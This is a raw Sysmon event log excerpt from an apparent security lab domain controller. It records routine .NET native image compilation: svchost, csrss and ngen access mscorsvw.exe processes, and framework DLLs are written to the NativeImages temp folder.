13:50:25.868{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9221-6005-FC03-00000000A301}4616C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008228Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:25.853{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9221-6005-FC03-00000000A301}4616C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008227Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:25.853{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9221-6005-FC03-00000000A301}4616C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008226Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:50:25.712{59A5CD1D-921F-6005-FB03-00000000A301}4796C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\12bc-0\ReachFramework.dll2021-01-18 13:50:25.712 10341000x80000000000000008248Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:26.728{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9222-6005-0204-00000000A301}4768C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008247Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:26.712{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9222-6005-0204-00000000A301}4768C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008246Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:26.712{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9222-6005-0204-00000000A301}4768C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008245Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:26.556{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9222-6005-0104-00000000A301}4480C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008244Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:26.540{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9222-6005-0104-00000000A301}4480C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008243Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:26.540{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9222-6005-0104-00000000A301}4480C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008242Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:26.431{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9222-6005-0004-00000000A301}884C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008241Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:26.431{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9222-6005-0004-00000000A301}884C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008240Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:26.431{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9222-6005-0004-00000000A301}884C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008239Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:26.149{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9222-6005-FF03-00000000A301}4676C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008238Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:26.134{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9222-6005-FF03-00000000A301}4676C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008237Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:26.134{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9222-6005-FF03-00000000A301}4676C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008236Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:50:26.071{59A5CD1D-9221-6005-FE03-00000000A301}4916C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1334-0\SMDiagnostics.dll2021-01-18 13:50:26.071 10341000x80000000000000008255Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:29.962{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9225-6005-0404-00000000A301}2532C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008254Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:29.946{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9225-6005-0404-00000000A301}2532C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008253Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:29.946{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9225-6005-0404-00000000A301}2532C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008252Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:29.587{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9225-6005-0304-00000000A301}3624C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008251Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:29.556{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9225-6005-0304-00000000A301}3624C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008250Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:29.556{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9225-6005-0304-00000000A301}3624C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008249Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:50:29.352{59A5CD1D-9222-6005-0204-00000000A301}4768C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\12a0-0\System.Activities.dll2021-01-18 13:50:29.352 10341000x80000000000000008269Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:31.946{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9227-6005-0804-00000000A301}4728C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008268Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:31.930{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9227-6005-0804-00000000A301}4728C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008267Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
